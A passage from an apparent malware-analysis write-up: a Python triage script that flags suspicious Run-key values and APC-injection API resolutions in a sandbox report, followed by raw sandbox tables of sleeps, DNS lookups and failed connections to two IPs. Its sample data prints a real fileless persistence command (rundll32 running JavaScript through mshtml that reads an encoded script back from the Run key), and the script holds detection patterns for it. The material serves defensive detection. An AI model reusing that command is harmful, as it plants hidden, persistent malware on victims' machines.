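# The rundll32 and "#@~^" rows copy this report (the encoded value is cut after
# its first bytes; the real one is 61268 bytes); the updater.exe row is an
# invented benign entry so the filter has something to let through.
SAMPLE_REPORT = r"""
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>"), size = 464, type = REG_SZ True 1
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax, size = 61268, type = REG_SZ True 1
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = C:\Program Files\Vendor\updater.exe /background, size = 96, type = REG_SZ True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76f11072 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAllocEx, address_out = 0x76f2d9b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteProcessMemory, address_out = 0x76f2d9e0 True 1
Get Address c:\windows\syswow64\ntdll.dll function = ZwQueueApcThread, address_out = 0x77c7ff14 True 1
Get Address c:\windows\syswow64\kernel32.dll function = ResumeThread, address_out = 0x76f143ef True 1
"""

WRITE_RE = re.compile(r"^Write Value (?P<key>\S+) data = (?P<data>.*), size = (?P<size>\d+), type = (?P<type>REG_\w+)")
FUNC_RE = re.compile(r"^Get Address (?P<module>\S+) function = (?P<fn>\w+), address_out = (?P<addr>0x[0-9a-fA-F]+)")
RUN_KEY_RE = re.compile(r"currentversion\\+run", re.IGNORECASE)

# Roles an APC-style injection needs and the APIs that fill them. CreateProcessW,
# NtQueueApcThread and QueueUserAPC are aliases assumed here, not names from the report.
INJECTION_ROLES = {
    "create target process": {"CreateProcessA", "CreateProcessW"},
    "allocate in target": {"VirtualAllocEx"},
    "write payload": {"WriteProcessMemory"},
    "queue APC to target thread": {"ZwQueueApcThread", "NtQueueApcThread", "QueueUserAPC"},
    "resume thread": {"ResumeThread"},
}


def parse_registry_writes(report_text: str) -> List[dict]:
    """Every 'Write Value <key> data = ..., size = N, type = T' row as a dict."""
    rows = []
    for line in report_text.splitlines():
        m = WRITE_RE.match(line.strip())
        if m:
            rows.append({"key": m["key"], "data": m["data"], "size": int(m["size"]), "type": m["type"]})
    return rows


def parse_resolved_functions(report_text: str) -> Set[str]:
    """Function names resolved through 'Get Address' rows."""
    matches = (FUNC_RE.match(line.strip()) for line in report_text.splitlines())
    return {m["fn"] for m in matches if m}


def classify_run_value(data: str) -> List[str]:
    """Indicator names a Run-key value trips; an empty list means nothing odd."""
    hits, lowered = [], data.lower()
    if "rundll32" in lowered and "javascript:" in lowered:   # rundll32 given a javascript: URL, not a DLL
        hits.append("rundll32-javascript-url")
    if "mshtml,runhtmlapplication" in lowered:                # mshtml turns rundll32 into a script host
        hits.append("mshtml-RunHTMLApplication")
    if "regread(" in lowered and RUN_KEY_RE.search(data):     # script body is read back out of a Run key
        hits.append("RegRead-of-Run-key")
    if data.startswith("#@~^"):                               # header emitted by JScript.Encode
        hits.append("jscript-encode-header")
    if "\\74" in data or "%20" in data:                       # \74 is octal '<': hides <script> from grep
        hits.append("escaped-script-markup")
    return hits


def injection_roles_present(resolved: Set[str]) -> Dict[str, Optional[str]]:
    """Each injection role mapped to the resolved API that fills it, or None."""
    return {role: next((fn for fn in sorted(names) if fn in resolved), None)
            for role, names in INJECTION_ROLES.items()}


def missing_injection_roles(resolved: Set[str]) -> List[str]:
    return [role for role, fn in injection_roles_present(resolved).items() if fn is None]


def triage(report_text: str) -> dict:
    """Flag suspicious Run values and report which injection roles the sample resolved."""
    writes = parse_registry_writes(report_text)
    resolved = parse_resolved_functions(report_text)
    flagged = [{"key": w["key"], "size": w["size"], "indicators": classify_run_value(w["data"])}
               for w in writes if classify_run_value(w["data"])]
    return {"run_values_written": len(writes), "flagged_run_values": flagged,
            "injection_roles": injection_roles_present(resolved),
            "injection_roles_missing": missing_injection_roles(resolved)}


if __name__ == "__main__":
    for name, value in triage(SAMPLE_REPORT).items():
        print(f"{name}: {value}")
```

Run it against the full report text and the two Run values are flagged while the benign entry passes; the same indicator list (rundll32 with a javascript: URL, mshtml,RunHTMLApplication, RegRead of a Run key, a value beginning with "#@~^") is what to carry into a live sweep of HKCU and HKLM Run keys, since nothing here touches disk. Two caveats: "escaped-script-markup" is weak on its own (legitimate command lines carry %20), so treat it as corroboration only; and resolving the five injection APIs is consistent with, not proof of, APC injection. The stronger evidence on this page is the Injection Information table, which records the actual write into powershell.exe at 0x60000 and the control-flow change on its thread 0x26c.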
System (11)
Operation Additional Information Success Count Logfile
Sleep duration = 5000 milliseconds (5.000 seconds) True 9
Fn
Get Info type = Operating System False 2
Fn
Network Behavior
DNS (2)
Operation Additional Information Success Count Logfile
Resolve Name host = 178.89.159.34, address_out = 178.89.159.34 True 1
Fn
Resolve Name host = 178.89.159.35, address_out = 178.89.159.35 True 1
Fn
TCP Sessions (1)
Information Value
Total Data Sent 0.00 KB (0 bytes)
Total Data Received 0.00 KB (0 bytes)
Contacted Host Count 2
Contacted Hosts 178.89.159.34:80, 178.89.159.35:80
TCP Session #1
Information Value
Handle 0x1c8
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 178.89.159.34
Remote Port 80
Local Address
Local Port
Data Sent 0.00 KB (0 bytes)
Data Received 0.00 KB (0 bytes)
Operations
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 178.89.159.34, remote_port = 80 False 1
Fn
Close type = SOCK_STREAM True 1
Fn
TCP Session #2
Information Value
Handle 0x1c8
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 178.89.159.35
Remote Port 80
Local Address
Local Port
Data Sent 0.00 KB (0 bytes)
Data Received 0.00 KB (0 bytes)
Operations
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 178.89.159.35, remote_port = 80 False 1
Fn